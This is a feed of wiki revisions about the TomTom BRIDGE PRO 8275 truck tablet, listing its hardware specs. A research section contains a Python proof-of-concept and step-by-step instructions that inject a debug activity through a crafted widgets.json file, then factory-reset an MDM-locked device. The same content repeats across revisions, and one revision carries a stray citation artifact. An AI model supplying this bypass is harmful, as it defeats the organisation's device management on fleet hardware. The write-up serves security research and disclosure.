                    wInfo.setId(widgetIndex + 1);&lt;br /&gt;
                    wInfo.setPackageName(appPackageName);&lt;br /&gt;
                    wInfo.setClassName(appClassName);&lt;br /&gt;
                    wInfo.setPageNumber(pageIndex + 1);&lt;br /&gt;
                    wInfo.setEnabled(true);&lt;br /&gt;
                    wInfo.setLayoutColumn(widgetIndexOnPage % 4);&lt;br /&gt;
                    wInfo.setLayoutRow(widgetIndexOnPage / 4);&lt;br /&gt;
                    wInfo.setBackgroundColor(resources.getColor(R.color.navpad_homescreen_background_color));&lt;br /&gt;
                    wInfo.setTextColor(resources.getColor(R.color.navpad_homescreen_appshortcut_text_color));&lt;br /&gt;
                    wInfo.setName(app.getLabel());&lt;br /&gt;
                    try {&lt;br /&gt;
                        Context otherAppCtx = context.createPackageContext(appPackageName, 2);&lt;br /&gt;
                        iconDrawable = otherAppCtx.getResources().getDrawableForDensity(activityInfo.getIconResource(), 320);&lt;br /&gt;
                    } catch (PackageManager.NameNotFoundException e) {&lt;br /&gt;
                        if (Log.W) {&lt;br /&gt;
                            Log.w(TAG, &amp;quot;Could not find package &amp;quot; + appPackageName + &amp;quot; to fetch larger icon.&amp;quot;);&lt;br /&gt;
                        }&lt;br /&gt;
                        iconDrawable = activityInfo.loadIcon(context.getPackageManager());&lt;br /&gt;
                    } catch (Resources.NotFoundException e2) {&lt;br /&gt;
                        if (Log.W) {&lt;br /&gt;
                            Log.w(TAG, &amp;quot;Could not fetch xhdpi icon from package &amp;quot; + appPackageName + &amp;quot; reverting to default icon.&amp;quot;);&lt;br /&gt;
                        }&lt;br /&gt;
                        iconDrawable = activityInfo.loadIcon(context.getPackageManager());&lt;br /&gt;
                    }&lt;br /&gt;
                    wInfo.setIconDrawable(iconDrawable);&lt;br /&gt;
                    this.mWidgetInfoList.add(wInfo);&lt;br /&gt;
                    widgetIndex++;&lt;br /&gt;
                }&lt;br /&gt;
            }&lt;br /&gt;
        }&lt;br /&gt;
        generateWidgetInfoMap();&lt;br /&gt;
        mAppShortcutsInfoCachedList = this.mWidgetInfoList;&lt;br /&gt;
    }&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Start the tablet in MDM mode or admin locked restricted mode. Start the '''PoC python script''' when the tablet is connected to the computer by MicroUSB wire and when a error occurs on the screen the code executed succesfully. Now press ok and swipe to left on the home screen and now you see '''Debug Intent Sender''', open it and fill in the action textbox '''&amp;quot;android.intent.action.MASTER_CLEAR&amp;quot;''' now press send broadcast and your locked device is '''factory reset'''.&lt;br /&gt;
&lt;br /&gt;
PoC script (Windows only, pymtp on Linux is a incomplete fork and does not work).&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;python&amp;quot;&amp;gt;&lt;br /&gt;
import os&lt;br /&gt;
import json&lt;br /&gt;
import time&lt;br /&gt;
import win32com.client&lt;br /&gt;
&lt;br /&gt;
OUTPUT_FILE = &amp;quot;widgets.json&amp;quot;&lt;br /&gt;
&lt;br /&gt;
JSON_DATA = {&lt;br /&gt;
    &amp;quot;application&amp;quot;: [&lt;br /&gt;
        {&lt;br /&gt;
            &amp;quot;package_name&amp;quot;: &amp;quot;com.android.settings&amp;quot;,&lt;br /&gt;
            &amp;quot;class_name&amp;quot;: &amp;quot;com.android.settings.DebugIntentSender&amp;quot;,&lt;br /&gt;
            &amp;quot;startcell&amp;quot;: &amp;quot;2.11&amp;quot;,&lt;br /&gt;
            &amp;quot;endcell&amp;quot;: &amp;quot;2.11&amp;quot;&lt;br /&gt;
        }&lt;br /&gt;
    ]&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
with open(OUTPUT_FILE, &amp;quot;w&amp;quot;) as f:&lt;br /&gt;
    json.dump(JSON_DATA, f, indent=4)&lt;br /&gt;
&lt;br /&gt;
shell = win32com.client.Dispatch(&amp;quot;Shell.Application&amp;quot;)&lt;br /&gt;
my_computer = shell.NameSpace(17)&lt;br /&gt;
&lt;br /&gt;
tomtom_device = None&lt;br /&gt;
for item in my_computer.Items():&lt;br /&gt;
    if &amp;quot;tomtom&amp;quot; in item.Name.lower():&lt;br /&gt;
        tomtom_device = item&lt;br /&gt;
        break&lt;br /&gt;
&lt;br /&gt;
if not tomtom_device:&lt;br /&gt;
    print(&amp;quot;TomTom device not found.&amp;quot;)&lt;br /&gt;
    exit(1)&lt;br /&gt;
&lt;br /&gt;
device_root = tomtom_device.GetFolder&lt;br /&gt;
&lt;br /&gt;
device_root.CopyHere(os.path.abspath(OUTPUT_FILE))&lt;br /&gt;
time.sleep(2)&lt;br /&gt;
&lt;br /&gt;
print(f&amp;quot;{OUTPUT_FILE} successfully injected DebugIntentSender.&amp;quot;)&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;gallery widths=&amp;quot;200px&amp;quot; heights=&amp;quot;120px&amp;quot; perrow=&amp;quot;3&amp;quot;&amp;gt;&lt;br /&gt;
File:Error after injection.jpg|Error after injection&lt;br /&gt;
File:Debugintentsender.jpg|DebugIntentSender class on the homescreen&lt;br /&gt;
File:Broadcast.jpg|Broadcast MASTER_CLEAR intent&lt;br /&gt;
&amp;lt;/gallery&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Unlocking Factory Tools ===== &lt;br /&gt;
Go to About your TomTom device. Now top Model number 5 times.&lt;br /&gt;
&amp;lt;gallery widths=&amp;quot;200px&amp;quot; heights=&amp;quot;120px&amp;quot; perrow=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
File:Factory tools.jpg|Factory Tools&lt;br /&gt;
&amp;lt;/gallery&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Research paper =====&lt;br /&gt;
[[:File:Android createPackageContext Paper 10 5 0.pdf|Android createPackageContext Paper 10 5 0.pdf]]&amp;lt;/br&amp;gt;&lt;br /&gt;
[https://www.ndss-symposium.org/wp-content/uploads/2017/09/10_5_0.pdf Download PDF remote]&lt;br /&gt;
&lt;br /&gt;
===== Disclosure status =====&lt;br /&gt;
This finding is based on internal testing and has not been publicly assigned a CVE at the time of writing.&lt;/div&gt;</summary>
		<author><name>Polymorphic7</name></author>
		
	</entry>
	<entry>
		<id>https://wiki.recessim.com/w/index.php?title=File:Factory_tools.jpg&amp;diff=3301</id>
		<title>File:Factory tools.jpg</title>
		<link rel="alternate" type="text/html" href="https://wiki.recessim.com/w/index.php?title=File:Factory_tools.jpg&amp;diff=3301"/>
		<updated>2026-04-04T01:05:36Z</updated>

		<summary type="html">&lt;p&gt;Polymorphic7: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Polymorphic7</name></author>
		
	</entry>
	<entry>
		<id>https://wiki.recessim.com/w/index.php?title=File:Broadcast.jpg&amp;diff=3300</id>
		<title>File:Broadcast.jpg</title>
		<link rel="alternate" type="text/html" href="https://wiki.recessim.com/w/index.php?title=File:Broadcast.jpg&amp;diff=3300"/>
		<updated>2026-04-04T01:00:05Z</updated>

		<summary type="html">&lt;p&gt;Polymorphic7: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Polymorphic7</name></author>
		
	</entry>
	<entry>
		<id>https://wiki.recessim.com/w/index.php?title=File:Debugintentsender.jpg&amp;diff=3299</id>
		<title>File:Debugintentsender.jpg</title>
		<link rel="alternate" type="text/html" href="https://wiki.recessim.com/w/index.php?title=File:Debugintentsender.jpg&amp;diff=3299"/>
		<updated>2026-04-04T00:59:31Z</updated>

		<summary type="html">&lt;p&gt;Polymorphic7: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Polymorphic7</name></author>
		
	</entry>
	<entry>
		<id>https://wiki.recessim.com/w/index.php?title=TomTom_BRIDGE_7%22_Truck/Pro_8275_(4FI70)&amp;diff=3297</id>
		<title>TomTom BRIDGE 7&quot; Truck/Pro 8275 (4FI70)</title>
		<link rel="alternate" type="text/html" href="https://wiki.recessim.com/w/index.php?title=TomTom_BRIDGE_7%22_Truck/Pro_8275_(4FI70)&amp;diff=3297"/>
		<updated>2026-04-03T03:24:32Z</updated>

		<summary type="html">&lt;p&gt;Polymorphic7: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Overview ==&lt;br /&gt;
The '''TomTom BRIDGE 7&amp;quot; Truck / PRO 8275 (model 4FI70)''' is a ruggedized, enterprise-grade GPS navigation and telematics device designed for commercial fleet and truck operations. It combines dedicated truck navigation with an open Android-based platform, allowing integration with business applications and fleet management systems such as WEBFLEET.&lt;br /&gt;
&lt;br /&gt;
The device is part of the TomTom BRIDGE ecosystem, which provides customizable in-vehicle hardware for logistics, telematics, and workflow automation.&lt;br /&gt;
&lt;br /&gt;
== Contents ==&lt;br /&gt;
__TOC__&lt;br /&gt;
&lt;br /&gt;
== Product family ==&lt;br /&gt;
* TomTom BRIDGE platform (Android-based in-vehicle terminal)&lt;br /&gt;
* TomTom PRO 8275 Truck (7&amp;quot; driver terminal variant)&lt;br /&gt;
* Model identifiers:&lt;br /&gt;
** 4FI70 (with cellular/GPRS module)&lt;br /&gt;
** 4FI72 / 4FI73 (non-cellular variants)&lt;br /&gt;
&lt;br /&gt;
== Key features ==&lt;br /&gt;
* 7-inch rugged touchscreen display&lt;br /&gt;
* Truck-specific navigation (routes optimized for size, weight, and restrictions)&lt;br /&gt;
* Open Android platform (AOSP-based)&lt;br /&gt;
* Support for custom enterprise applications&lt;br /&gt;
* Integration with fleet management systems (e.g., WEBFLEET)&lt;br /&gt;
* Built-in mobile device management (MDM) capabilities&lt;br /&gt;
* Lifetime maps and navigation services (subject to lifecycle support)&lt;br /&gt;
* Rear camera and vehicle integration support&lt;br /&gt;
&lt;br /&gt;
== Hardware specifications ==&lt;br /&gt;
=== System ===&lt;br /&gt;
* Operating system: Android 4.3 (14 Jun 2017 kernel patches)&lt;br /&gt;
* CPU: Qualcomm Snapdragon 400 (quad-core, 1.2 GHz) &lt;br /&gt;
* RAM: 1.5 GB &lt;br /&gt;
* Storage: 16 GB / 32 GB (expandable via SD card)&lt;br /&gt;
&lt;br /&gt;
=== Display ===&lt;br /&gt;
* Resolution: 1280×720 (720p)&lt;br /&gt;
* Multi-touch capacitive screen &lt;br /&gt;
&lt;br /&gt;
=== Connectivity ===&lt;br /&gt;
* Wi-Fi (2.4 GHz / 5 GHz)&lt;br /&gt;
* Bluetooth 4.0&lt;br /&gt;
* Cellular (model-dependent, e.g., 4FI70 includes GSM/LTE)&lt;br /&gt;
* USB (OTG support)&lt;br /&gt;
* CAN bus interface for vehicle integration&lt;br /&gt;
&lt;br /&gt;
=== Sensors ===&lt;br /&gt;
* GPS / GLONASS GNSS receiver&lt;br /&gt;
* Accelerometer&lt;br /&gt;
* Gyroscope&lt;br /&gt;
&lt;br /&gt;
=== Power ===&lt;br /&gt;
* 8–32V input by docking (compatible with 12V/24V vehicle systems)&lt;br /&gt;
* MicroUSB charging 5v&lt;br /&gt;
&lt;br /&gt;
=== Device I/O ===&lt;br /&gt;
==== Docking connector ====&lt;br /&gt;
* Proprietary multi-pin docking interface&lt;br /&gt;
* Used for:&lt;br /&gt;
** Power delivery (via vehicle dock)&lt;br /&gt;
** CAN bus integration&lt;br /&gt;
** External peripherals (e.g., cameras, telematics modules)&lt;br /&gt;
* Enables fixed in-vehicle installation with secure mounting&lt;br /&gt;
&lt;br /&gt;
==== USB ====&lt;br /&gt;
* Micro-USB port (front-facing)&lt;br /&gt;
* Supports:&lt;br /&gt;
** Device charging&lt;br /&gt;
** Data transfer (MTP/PTP)&lt;br /&gt;
** Android Debug Bridge (ADB) access (if enabled)&lt;br /&gt;
** USB On-The-Go (OTG) for supported peripherals&lt;br /&gt;
&lt;br /&gt;
==== microSD card slot ====&lt;br /&gt;
* Supports microSD / microSDHC cards&lt;br /&gt;
* Used for:&lt;br /&gt;
** Storage expansion (maps, applications, media)&lt;br /&gt;
** Offline data transfer and updates&lt;br /&gt;
&lt;br /&gt;
== Software and platform ==&lt;br /&gt;
The TomTom BRIDGE platform is based on the Android Open Source Project (AOSP), enabling:&lt;br /&gt;
* Installation of custom APK applications&lt;br /&gt;
* Integration with enterprise backends&lt;br /&gt;
* Remote configuration and control via MDM systems&lt;br /&gt;
* Access to standard Android APIs alongside TomTom navigation APIs&lt;br /&gt;
&lt;br /&gt;
TomTom maintains control over firmware and system updates to ensure regulatory compliance and device integrity.&lt;br /&gt;
&lt;br /&gt;
== Lifecycle ==&lt;br /&gt;
Devices in the 4FI70 series have reached end-of-life status but may still receive limited support and updates.&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Device Administrator / MDM policy privilege escalation ==&lt;br /&gt;
This section is for educational and defensive security research purposes only.&lt;br /&gt;
&lt;br /&gt;
=== Overview ===&lt;br /&gt;
The TomTom BRIDGE platform supports enterprise Mobile Device Management (MDM) and Android Device Administrator APIs. These features allow organizations to:&lt;br /&gt;
* Enforce security policies&lt;br /&gt;
* Control application installation&lt;br /&gt;
* Restrict user actions&lt;br /&gt;
* Remotely manage the device&lt;br /&gt;
&lt;br /&gt;
Because the device runs 4.3 (kernel patched Jun 14 2017), it relies on legacy Device Administrator mechanisms rather than modern Android Enterprise (Device Owner) APIs.&lt;br /&gt;
&lt;br /&gt;
==== createPackageContext misuse (research finding) ====&lt;br /&gt;
During analysis of the TomTom BRIDGE platform, a potential issue was identified related to the use of the Android API method &amp;lt;code&amp;gt;createPackageContext()&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
===== Background =====&lt;br /&gt;
The &amp;lt;code&amp;gt;createPackageContext()&amp;lt;/code&amp;gt; method allows an application to create a context for another installed package. When used with specific flags (e.g., &amp;lt;code&amp;gt;CONTEXT_INCLUDE_CODE&amp;lt;/code&amp;gt; or &amp;lt;code&amp;gt;CONTEXT_IGNORE_SECURITY&amp;lt;/code&amp;gt;), it can enable access to that application's resources or code, depending on system permissions and signature alignment.&lt;br /&gt;
&lt;br /&gt;
This mechanism is typically restricted to:&lt;br /&gt;
* System applications&lt;br /&gt;
* Applications signed with the same certificate&lt;br /&gt;
* Privileged contexts with elevated permissions&lt;br /&gt;
&lt;br /&gt;
===== Observed behavior =====&lt;br /&gt;
Testing on the PRO 8275 (Android 4.3 14 Jun 2017 kernel patches) indicated that:&lt;br /&gt;
* Certain preinstalled or privileged applications expose functionality that can be accessed via &amp;lt;code&amp;gt;createPackageContext()&amp;lt;/code&amp;gt;&lt;br /&gt;
* In some cases, access controls appeared weaker than expected for a hardened enterprise deployment&lt;br /&gt;
* The behavior may allow interaction with components or resources outside the normal application sandbox&lt;br /&gt;
&lt;br /&gt;
===== Proof of concept (high-level demonstration) =====&lt;br /&gt;
This demonstration is intentionally limited and omits exploit details. It is intended to validate behavior in a controlled research environment only.&lt;br /&gt;
&lt;br /&gt;
Weakness in the system is the widget.json fechter from Internal storage.&amp;lt;/br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
com.tomtom.navpad.widgetorganizerlib.WidgetInfoFetcher.fetchInstalledWidgets&amp;lt;/br&amp;gt;&lt;br /&gt;
and&amp;lt;/br&amp;gt;&lt;br /&gt;
com.tomtom.navpad.widgetorganizerlib.WidgetInfoFetcher.fetchInstalledApplications&amp;lt;/br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;java&amp;quot;&amp;gt;&lt;br /&gt;
    private void fetchInstalledApplications(Context context, boolean showTestapps) {&lt;br /&gt;
        Drawable iconDrawable;&lt;br /&gt;
        if (!$assertionsDisabled &amp;amp;&amp;amp; context == null) {&lt;br /&gt;
            throw new AssertionError();&lt;br /&gt;
        }&lt;br /&gt;
        if (mAppShortcutsInfoCachedList != null) {&lt;br /&gt;
            this.mWidgetInfoList.addAll(mAppShortcutsInfoCachedList);&lt;br /&gt;
            generateWidgetInfoMap();&lt;br /&gt;
            return;&lt;br /&gt;
        }&lt;br /&gt;
        Resources resources = context.getResources();&lt;br /&gt;
        ArrayList&amp;lt;CachedActivityInfo&amp;gt; apps = createAppList(context, showTestapps);&lt;br /&gt;
        int widgetIndex = 0;&lt;br /&gt;
        for (CachedActivityInfo app : apps) {&lt;br /&gt;
            ActivityInfo activityInfo = app.getActivityInfo();&lt;br /&gt;
            String appPackageName = activityInfo.packageName;&lt;br /&gt;
            String appClassName = activityInfo.name;&lt;br /&gt;
            if (!NAVAPP_PACKAGE_NAME.equals(appPackageName) || !&amp;quot;com.tomtom.navpad.navapp.NavPadAppDrawerActivity&amp;quot;.equals(appClassName)) {&lt;br /&gt;
                if (this.mIsConfigurable || !NAVAPP_PACKAGE_NAME.equals(appPackageName) || !&amp;quot;com.tomtom.navpad.navapp.NavPadWidgetDrawerActivity&amp;quot;.equals(appClassName)) {&lt;br /&gt;
                    int pageIndex = widgetIndex / 8;&lt;br /&gt;
                    int widgetIndexOnPage = widgetIndex % 8;&lt;br /&gt;
                    WidgetInfo wInfo = new WidgetInfo();&lt;br /&gt;
                    wInfo.setWidgetType(WidgetInfo.WidgetType.APPSHORTCUT);&lt;br /&gt;
                    wInfo.setIsFromDrawer(true);&lt;br /&gt;
                    wInfo.setId(widgetIndex + 1);&lt;br /&gt;
                    wInfo.setPackageName(appPackageName);&lt;br /&gt;
                    wInfo.setClassName(appClassName);&lt;br /&gt;
                    wInfo.setPageNumber(pageIndex + 1);&lt;br /&gt;
                    wInfo.setEnabled(true);&lt;br /&gt;
                    wInfo.setLayoutColumn(widgetIndexOnPage % 4);&lt;br /&gt;
                    wInfo.setLayoutRow(widgetIndexOnPage / 4);&lt;br /&gt;
                    wInfo.setBackgroundColor(resources.getColor(R.color.navpad_homescreen_background_color));&lt;br /&gt;
                    wInfo.setTextColor(resources.getColor(R.color.navpad_homescreen_appshortcut_text_color));&lt;br /&gt;
                    wInfo.setName(app.getLabel());&lt;br /&gt;
                    try {&lt;br /&gt;
                        Context otherAppCtx = context.createPackageContext(appPackageName, 2);&lt;br /&gt;
                        iconDrawable = otherAppCtx.getResources().getDrawableForDensity(activityInfo.getIconResource(), 320);&lt;br /&gt;
                    } catch (PackageManager.NameNotFoundException e) {&lt;br /&gt;
                        if (Log.W) {&lt;br /&gt;
                            Log.w(TAG, &amp;quot;Could not find package &amp;quot; + appPackageName + &amp;quot; to fetch larger icon.&amp;quot;);&lt;br /&gt;
                        }&lt;br /&gt;
                        iconDrawable = activityInfo.loadIcon(context.getPackageManager());&lt;br /&gt;
                    } catch (Resources.NotFoundException e2) {&lt;br /&gt;
                        if (Log.W) {&lt;br /&gt;
                            Log.w(TAG, &amp;quot;Could not fetch xhdpi icon from package &amp;quot; + appPackageName + &amp;quot; reverting to default icon.&amp;quot;);&lt;br /&gt;
                        }&lt;br /&gt;
                        iconDrawable = activityInfo.loadIcon(context.getPackageManager());&lt;br /&gt;
                    }&lt;br /&gt;
                    wInfo.setIconDrawable(iconDrawable);&lt;br /&gt;
                    this.mWidgetInfoList.add(wInfo);&lt;br /&gt;
                    widgetIndex++;&lt;br /&gt;
                }&lt;br /&gt;
            }&lt;br /&gt;
        }&lt;br /&gt;
        generateWidgetInfoMap();&lt;br /&gt;
        mAppShortcutsInfoCachedList = this.mWidgetInfoList;&lt;br /&gt;
    }&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Start the tablet in MDM mode or admin locked restricted mode. Start the '''PoC python script''' when the tablet is connected to the computer by MicroUSB wire and when a error occurs on the screen the code executed succesfully. Now press ok and swipe to left on the home screen and now you see '''Debug Intent Sender''', open it and fill in the action textbox '''&amp;quot;android.intent.action.MASTER_CLEAR&amp;quot;''' now press send broadcast and your locked device is '''factory reset'''.&lt;br /&gt;
&lt;br /&gt;
PoC script (Windows only, pymtp on Linux is a incomplete fork and does not work).&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;python&amp;quot;&amp;gt;&lt;br /&gt;
import os&lt;br /&gt;
import json&lt;br /&gt;
import time&lt;br /&gt;
import win32com.client&lt;br /&gt;
&lt;br /&gt;
OUTPUT_FILE = &amp;quot;widgets.json&amp;quot;&lt;br /&gt;
&lt;br /&gt;
JSON_DATA = {&lt;br /&gt;
    &amp;quot;application&amp;quot;: [&lt;br /&gt;
        {&lt;br /&gt;
            &amp;quot;package_name&amp;quot;: &amp;quot;com.android.settings&amp;quot;,&lt;br /&gt;
            &amp;quot;class_name&amp;quot;: &amp;quot;com.android.settings.DebugIntentSender&amp;quot;,&lt;br /&gt;
            &amp;quot;startcell&amp;quot;: &amp;quot;2.11&amp;quot;,&lt;br /&gt;
            &amp;quot;endcell&amp;quot;: &amp;quot;2.11&amp;quot;&lt;br /&gt;
        }&lt;br /&gt;
    ]&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
with open(OUTPUT_FILE, &amp;quot;w&amp;quot;) as f:&lt;br /&gt;
    json.dump(JSON_DATA, f, indent=4)&lt;br /&gt;
&lt;br /&gt;
shell = win32com.client.Dispatch(&amp;quot;Shell.Application&amp;quot;)&lt;br /&gt;
my_computer = shell.NameSpace(17)&lt;br /&gt;
&lt;br /&gt;
tomtom_device = None&lt;br /&gt;
for item in my_computer.Items():&lt;br /&gt;
    if &amp;quot;tomtom&amp;quot; in item.Name.lower():&lt;br /&gt;
        tomtom_device = item&lt;br /&gt;
        break&lt;br /&gt;
&lt;br /&gt;
if not tomtom_device:&lt;br /&gt;
    print(&amp;quot;TomTom device not found.&amp;quot;)&lt;br /&gt;
    exit(1)&lt;br /&gt;
&lt;br /&gt;
device_root = tomtom_device.GetFolder&lt;br /&gt;
&lt;br /&gt;
device_root.CopyHere(os.path.abspath(OUTPUT_FILE))&lt;br /&gt;
time.sleep(2)&lt;br /&gt;
&lt;br /&gt;
print(f&amp;quot;{OUTPUT_FILE} successfully injected DebugIntentSender.&amp;quot;)&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;gallery widths=&amp;quot;120px&amp;quot; heights=&amp;quot;120px&amp;quot; perrow=&amp;quot;3&amp;quot;&amp;gt;&lt;br /&gt;
https://i.ibb.co/0psNg8y4/error-after-injection.jpg|error after injection&lt;br /&gt;
https://i.ibb.co/HTHtyDL0/debugintentsender.jpg|DebugIntentSender class&lt;br /&gt;
https://i.ibb.co/bgZj324Y/broadcast.jpg|broadcast MASTER_CLEAR intent&lt;br /&gt;
&amp;lt;/gallery&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Research paper =====&lt;br /&gt;
[[:File:Android createPackageContext Paper 10 5 0.pdf|Android createPackageContext Paper 10 5 0.pdf]]&amp;lt;/br&amp;gt;&lt;br /&gt;
[https://www.ndss-symposium.org/wp-content/uploads/2017/09/10_5_0.pdf Download PDF remote]&lt;br /&gt;
&lt;br /&gt;
===== Disclosure status =====&lt;br /&gt;
This finding is based on internal testing and has not been publicly assigned a CVE at the time of writing.&lt;/div&gt;</summary>
		<author><name>Polymorphic7</name></author>
		
	</entry>
	<entry>
		<id>https://wiki.recessim.com/w/index.php?title=TomTom_BRIDGE_7%22_Truck/Pro_8275_(4FI70)&amp;diff=3296</id>
		<title>TomTom BRIDGE 7&quot; Truck/Pro 8275 (4FI70)</title>
		<link rel="alternate" type="text/html" href="https://wiki.recessim.com/w/index.php?title=TomTom_BRIDGE_7%22_Truck/Pro_8275_(4FI70)&amp;diff=3296"/>
		<updated>2026-04-03T03:20:13Z</updated>

		<summary type="html">&lt;p&gt;Polymorphic7: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Overview ==&lt;br /&gt;
The '''TomTom BRIDGE 7&amp;quot; Truck / PRO 8275 (model 4FI70)''' is a ruggedized, enterprise-grade GPS navigation and telematics device designed for commercial fleet and truck operations. It combines dedicated truck navigation with an open Android-based platform, allowing integration with business applications and fleet management systems such as WEBFLEET.&lt;br /&gt;
&lt;br /&gt;
The device is part of the TomTom BRIDGE ecosystem, which provides customizable in-vehicle hardware for logistics, telematics, and workflow automation.&lt;br /&gt;
&lt;br /&gt;
== Contents ==&lt;br /&gt;
__TOC__&lt;br /&gt;
&lt;br /&gt;
== Product family ==&lt;br /&gt;
* TomTom BRIDGE platform (Android-based in-vehicle terminal)&lt;br /&gt;
* TomTom PRO 8275 Truck (7&amp;quot; driver terminal variant)&lt;br /&gt;
* Model identifiers:&lt;br /&gt;
** 4FI70 (with cellular/GPRS module)&lt;br /&gt;
** 4FI72 / 4FI73 (non-cellular variants)&lt;br /&gt;
&lt;br /&gt;
== Key features ==&lt;br /&gt;
* 7-inch rugged touchscreen display&lt;br /&gt;
* Truck-specific navigation (routes optimized for size, weight, and restrictions)&lt;br /&gt;
* Open Android platform (AOSP-based)&lt;br /&gt;
* Support for custom enterprise applications&lt;br /&gt;
* Integration with fleet management systems (e.g., WEBFLEET)&lt;br /&gt;
* Built-in mobile device management (MDM) capabilities&lt;br /&gt;
* Lifetime maps and navigation services (subject to lifecycle support)&lt;br /&gt;
* Rear camera and vehicle integration support&lt;br /&gt;
&lt;br /&gt;
== Hardware specifications ==&lt;br /&gt;
=== System ===&lt;br /&gt;
* Operating system: Android 4.3 (14 Jun 2017 kernel patches)&lt;br /&gt;
* CPU: Qualcomm Snapdragon 400 (quad-core, 1.2 GHz) &lt;br /&gt;
* RAM: 1.5 GB &lt;br /&gt;
* Storage: 16 GB / 32 GB (expandable via SD card)&lt;br /&gt;
&lt;br /&gt;
=== Display ===&lt;br /&gt;
* Resolution: 1280×720 (720p)&lt;br /&gt;
* Multi-touch capacitive screen &lt;br /&gt;
&lt;br /&gt;
=== Connectivity ===&lt;br /&gt;
* Wi-Fi (2.4 GHz / 5 GHz)&lt;br /&gt;
* Bluetooth 4.0&lt;br /&gt;
* Cellular (model-dependent, e.g., 4FI70 includes GSM/LTE)&lt;br /&gt;
* USB (OTG support)&lt;br /&gt;
* CAN bus interface for vehicle integration&lt;br /&gt;
&lt;br /&gt;
=== Sensors ===&lt;br /&gt;
* GPS / GLONASS GNSS receiver&lt;br /&gt;
* Accelerometer&lt;br /&gt;
* Gyroscope&lt;br /&gt;
&lt;br /&gt;
=== Power ===&lt;br /&gt;
* 8–32V input by docking (compatible with 12V/24V vehicle systems)&lt;br /&gt;
* MicroUSB charging 5v&lt;br /&gt;
&lt;br /&gt;
=== Device I/O ===&lt;br /&gt;
==== Docking connector ====&lt;br /&gt;
* Proprietary multi-pin docking interface&lt;br /&gt;
* Used for:&lt;br /&gt;
** Power delivery (via vehicle dock)&lt;br /&gt;
** CAN bus integration&lt;br /&gt;
** External peripherals (e.g., cameras, telematics modules)&lt;br /&gt;
* Enables fixed in-vehicle installation with secure mounting&lt;br /&gt;
&lt;br /&gt;
==== USB ====&lt;br /&gt;
* Micro-USB port (front-facing)&lt;br /&gt;
* Supports:&lt;br /&gt;
** Device charging&lt;br /&gt;
** Data transfer (MTP/PTP)&lt;br /&gt;
** Android Debug Bridge (ADB) access (if enabled)&lt;br /&gt;
** USB On-The-Go (OTG) for supported peripherals&lt;br /&gt;
&lt;br /&gt;
==== microSD card slot ====&lt;br /&gt;
* Supports microSD / microSDHC cards&lt;br /&gt;
* Used for:&lt;br /&gt;
** Storage expansion (maps, applications, media)&lt;br /&gt;
** Offline data transfer and updates&lt;br /&gt;
&lt;br /&gt;
== Software and platform ==&lt;br /&gt;
The TomTom BRIDGE platform is based on the Android Open Source Project (AOSP), enabling:&lt;br /&gt;
* Installation of custom APK applications&lt;br /&gt;
* Integration with enterprise backends&lt;br /&gt;
* Remote configuration and control via MDM systems&lt;br /&gt;
* Access to standard Android APIs alongside TomTom navigation APIs&lt;br /&gt;
&lt;br /&gt;
TomTom maintains control over firmware and system updates to ensure regulatory compliance and device integrity.&lt;br /&gt;
&lt;br /&gt;
== Lifecycle ==&lt;br /&gt;
Devices in the 4FI70 series have reached end-of-life status but may still receive limited support and updates. :contentReference[oaicite:11]{index=11}&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Device Administrator / MDM policy privilege escalation ==&lt;br /&gt;
This section is for educational and defensive security research purposes only.&lt;br /&gt;
&lt;br /&gt;
=== Overview ===&lt;br /&gt;
The TomTom BRIDGE platform supports enterprise Mobile Device Management (MDM) and Android Device Administrator APIs. These features allow organizations to:&lt;br /&gt;
* Enforce security policies&lt;br /&gt;
* Control application installation&lt;br /&gt;
* Restrict user actions&lt;br /&gt;
* Remotely manage the device&lt;br /&gt;
&lt;br /&gt;
Because the device runs 4.3 (kernel patched Jun 14 2017), it relies on legacy Device Administrator mechanisms rather than modern Android Enterprise (Device Owner) APIs.&lt;br /&gt;
&lt;br /&gt;
==== createPackageContext misuse (research finding) ====&lt;br /&gt;
During analysis of the TomTom BRIDGE platform, a potential issue was identified related to the use of the Android API method &amp;lt;code&amp;gt;createPackageContext()&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
===== Background =====&lt;br /&gt;
The &amp;lt;code&amp;gt;createPackageContext()&amp;lt;/code&amp;gt; method allows an application to create a context for another installed package. When used with specific flags (e.g., &amp;lt;code&amp;gt;CONTEXT_INCLUDE_CODE&amp;lt;/code&amp;gt; or &amp;lt;code&amp;gt;CONTEXT_IGNORE_SECURITY&amp;lt;/code&amp;gt;), it can enable access to that application's resources or code, depending on system permissions and signature alignment.&lt;br /&gt;
&lt;br /&gt;
This mechanism is typically restricted to:&lt;br /&gt;
* System applications&lt;br /&gt;
* Applications signed with the same certificate&lt;br /&gt;
* Privileged contexts with elevated permissions&lt;br /&gt;
&lt;br /&gt;
===== Observed behavior =====&lt;br /&gt;
